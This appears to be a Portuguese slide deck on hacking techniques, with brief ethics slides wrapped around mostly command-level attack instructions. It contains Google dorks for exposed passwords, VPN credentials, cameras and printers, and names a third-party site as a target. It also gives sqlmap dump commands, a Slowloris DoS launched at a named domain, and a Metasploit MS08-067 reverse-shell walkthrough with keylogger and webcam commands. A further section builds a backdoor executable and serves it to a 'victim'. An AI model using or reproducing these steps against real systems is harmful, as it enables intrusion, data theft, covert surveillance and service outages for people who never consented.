- O documento discute técnicas de invasão de sistemas e ética hacker, incluindo SQL injection, exploits, engenharia social e Google hacking. Ele fornece instruções sobre como usar ferramentas como Kali Linux, msfconsole e sqlmap para realizar ataques de negação de serviço e obter acesso não autorizado a sistemas.
2. SUMÁRIO
• O que são?
• Por quem são usados?
• Para que servem?
• Ética Hacker
• Principais Tipos e Métodos de Ataques:
• Engenharia Social
• Google Hacking
• SQLi
• DOS & DDOS
• Exploits
• Visão no Mercado de Trabalho e a Ética Hacker
3. AMBIENTE DE TRABALHO
Máquinas virtuais:
- Kali Linux
- Windows XP e 7
Alvo para ataque:
- http://testphp.vulnweb.com/
4. O que são?
- São testes e métodos utilizados para
romper mecanismos de segurança de
um determinado alvo.
6. Por quem são usados?
- Por Hackers
- Por Crackers
- Por Pentesters
- Por Analistas de Segurança da
Informação
7.
8. Definições dos Chapéus
- White Hat (Chapéu Branco)
- Black Hat (Chapéu Preto)
- Gray Hat (Chapéu Cinza)
9. Ethical Hacker (Ética Hacker)
Ética Hacker é o termo que descreve os valores
morais e filosóficos na comunidade hacker. O ponto
chave da ética é o livre acesso a informações e
melhoria da qualidade de vida.
10. Para que servem (na visão White hat)?
- Tem finalidade de testar em determinado
alvo a qualidade de sua “segurança” a fim
de prevenir um possível ataque e
comprometimento da informação.
11.
12. Engenharia Social
• Práticas utilizadas para conseguir acesso a
informações. Não é necessário nenhum equipamento
para tal, apenas um aproveito da falha humana, e para
isso é necessário somente habilidades de atuação:
persuadir, explorar a confiança das pessoas.
• Os tipos de exploração dessa técnica é através:
Pessoas
Sistemas
13. Engenharia Social
1. Pessoas
• Exploração de algumas fragilidades do psicológico humano: ego,
vaidade, a vontade de ser útil...
• Técnicas utilizadas: telefonemas, e-mails falsos, vasculhação de lixo, e
até aquisição de uma nova personalidade para se passar por outra
pessoa.
• Um engenheiro social se passando pelo chefe de um departamento ou
suporte de T.I para solicitar informações de senhas e de usuários.
• Quando as vítimas passam por essa situação, elas não percebem que
estão sendo manipuladas.
1. Pessoas
2. Sistemas
14. Engenharia Social
2. Sistemas
As técnicas utilizadas pelo golpista são apenas on-line, consistindo em:
• Phishing: páginas falsas desenvolvidas para capturar dados da vítima. Essas
páginas podem parecer legítimas e ter a mesma aparência de páginas já
conhecidas. Exemplo de renovação de contas de bancos, boletos falsos,
etc...
• Malwares: Links(spans) ou anexos maliciosos. Ao serem abertos, atacam
de forma silenciosa, permitindo ao golpista controle total do computador.
• Arquivos PDF ou documentos Microsoft Office infectados.
16. Google Hacking
• Utiliza mecanismo de busca para procurar falhas ou
informações refinadas.
• Onde podemos explorar falhas e invadir dispositivos
eletrônicos como roteadores, sites/servidores,
câmeras, impressoras, entre outros.
• Podemos buscar dados de pessoas (podendo ser
usando numa engenharia social).
• Mais da metades dos ataques são ocorrida através
deste método.
17. Dorks
• São “strings” utilizadas pelo motor de
busca as quais permite encontrar alvos
vulneráveis.
• Exemplo: “filetype:pdf inurl:hacking”
18. • intitle, allintitle
- intitle: faz uma busca no conteúdo no título
(tag title) da página.
- allintitle: quebra a regra do exemplo acima,
dizendo ao Google que todas as palavras que
seguem devem ser encontradas no title da
página (mais restrito).
Exemplo “intitle: login.php”
19. • inurl, allinurl
- inurl: encontra texto em uma URL.
- alliurl: funciona de maneira idêntica ao inurl mas
de forma restritiva, exibindo resultados apenas em
que todas as strings foram encontradas.
- Exemplo “inurl: admin”
20. • filetype
- Busca por um arquivo de determinado tipo (extensão). O
operador filetype pode ajudá-lo na busca de tipo de arquivos
específicos. Mais especificamente, podemos utilizar esse
operador para pesquisas de páginas que terminam em uma
determinada extensão.
Exemplo “filetype: xls”
21. • intext,allintext
- intext: localiza uma string dentro do texto de uma página.
- allintext: localiza o termo no texto da página. Utilizar o
operador allintext também pode servir como um atalho para
"encontrar esta string em qualquer lugar, exceto no title, URL e
links".
- Exemplo “intext: Dilma”
22. • Site
- Direciona a pesquisa para o conteúdo de um determinado site.
Apesar de ser tecnicamente uma parte da URL, o endereço (ou
nome de domínio) de um servidor pode ser mais bem
pesquisada com o operador site.
Exemplo “site:gov.br”
23. Google Hacking
• Buscando arquivos de anotações de senha:
# intitle:”index of /” senhas.txt
# filetype:txt + senha + com.br
# filetype:txt intext:senha
• Buscando backup de configurações de CMSs
# intext:"~~Joomla1.txt" title:"Indexof /"
Alvo interessante: http://tiagofeitosa.com/cb/
# configuration.php_ “<?phpclass Jconfig{“
# inurl:wp-config.old
# inurl:configuration.php.bkp
24. Google Hacking
• Invadindo impressora remota
# intitle:”Web Image Monitor” & inurl:”/mainframe.cgi”
• Buscando câmeras disponíveis na internet:
# intitle:"Live View -AXIS 211"
# inurl:"viewerframe?mode=motion“
# inurl:”/control/userimage.html”
• Buscando por arquivos de VPN
# !HOST=*.* intext:enc_UserPassword=* ext:pcf
25. Google Hacking
Mais dorks..
• inurl:"passes" OR inurl:"passwords" OR
inurl:"credentials" -search -download -techsupt
-git -games -gz -bypass -exe filetype:txt
@yahoo.com OR @gmail OR @hotmail
• ext:sql intext:@gmail.com intext:password
26. • Ataque que permite a injeção no query (banco de
dados) retornando parâmetro não validados.
Como informações de tabelas e colunas a qual
podemos extrair informações privilegiadas sendo
senhas de usuários, e-mails, cartões de créditos,
entre outras informações delicadas.
29. SQLi
• Buscando falha de SQLi
– Manualmente
– Google Hacking
– Scanners (Nessus, Vega, Acunetix..)
30. SQLi (Sqlmap)
Alvo: http://testphp.vulnweb.com/artists.php?artist=1
- Buscando o Banco de dados
# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
- Buscando as Tabelas
# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco --tables
-Buscando as Colunas
# slqmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco -T
Nome_da_Tabela --columns
-Extraindo os dados das Colunas
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco -T
Nome_da_Tabela –C Nome_da_Colunas ‘nome,senha,email’ --dump
31. DOS & DDOS
• Ataques que viabilizam emitir
diversas requisições por segundo
para um alvo sobrecarregando,
fazendo com que o serviço fique
indisponível.
34. Slowloris (instalação e ataque)
Baixe a ferramenta:
# wget http://ha.ckers.org/slowloris/slowloris.pl
Atribui a permissão para executa-lo.
# chmod 777 slowloris.pl
Inicie o Ataque:
# slowloris.pl -dns www.cienciahacker.cf -port 80 -timeout 5 -num 5000
-dns = indica o alvo, podendo ser um IP ou SITE
-port = Porta para o ataque.
-timeout = Tempo de espera entre cada ataque
-num = numero de pacotes.
35. Exploits
• Um exploit é um pedaço de software, um pedaço de
dados ou uma sequência de comandos que tomam
vantagem de um defeito, falha
ou vulnerabilidade afim de causar um comportamento
acidental ou imprevisto a ocorrer no software ou
hardware de um computador ou em algum eletrônico
(normalmente computadorizado). Tal comportamento
frequentemente inclui coisas como ganhar o controle
de um sistema de computador, permitindo elevação
de privilégio ou um ataque de negação de serviço.
36. Exploitando Windows XP
• Abrimos a ferramenta msfconsole.
# msfconsole
• E selecionamos o exploit a seguir:
# use windows/smb/ms08_067_netapi
• Depois disso colocaremos o IP da vítima.
# set RHOST 192.168.2.108
• Selecionamos o nosso payload a qual permite a interação entre
nós e a vítima.
# set PAYLOAD windows/meterpreter/reverse_tcp
37. Exploitando Windows XP
• E o nosso IP para receber a conexão.
# set LHOST 192.168.2.103
• E o comando abaixo para executar o exploit já selecionado:
# exploit
Comandos Extras:
• webcam_list,
• webcam_snap,
• shutdown -n
• screenshot
• keyscan_start
• keyscan_dump
• keyscan_stop
• shutdown -s -t 1
• sysinfo
38. Exploitando Windows 7 e 8
• Criamos o nosso payload com nosso ip e a porta 4444 para se comunicar com a
vitima e damos um nome a ele:
#msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444
x>name.exe
• Abrimos o msfconsole que é a nossa interface do nossos exploits a serem
usados
#msfconsole
• Agora colocamos o nosso computador em modo listening a qual deixa
esperando uma conexão com nosso payload criado.
#use exploit/multi/handler
• E agora informamos qual o nosso payload que iremos receber nessa chamada
#set payload windows/meterpreter/reverse_tcp
39. Exploitando Windows 7 e 8
• Depois disso colocamos o nosso IP para receber a conexão com a
vitima.
#set lhost IP
• E o comando para executar nosso exploit.
#exploit
• Agora enviamos a vítima através do Apache
#cp nome.exe /var/www
#service apache2 start
Agora só efetuar o download pelo IP do seu Apache e executar a
backdoor.
40.
41. Visão no Mercado de Trabalho
• Carência de profissionais éticos
• Certificações
• Leis Cibernéticas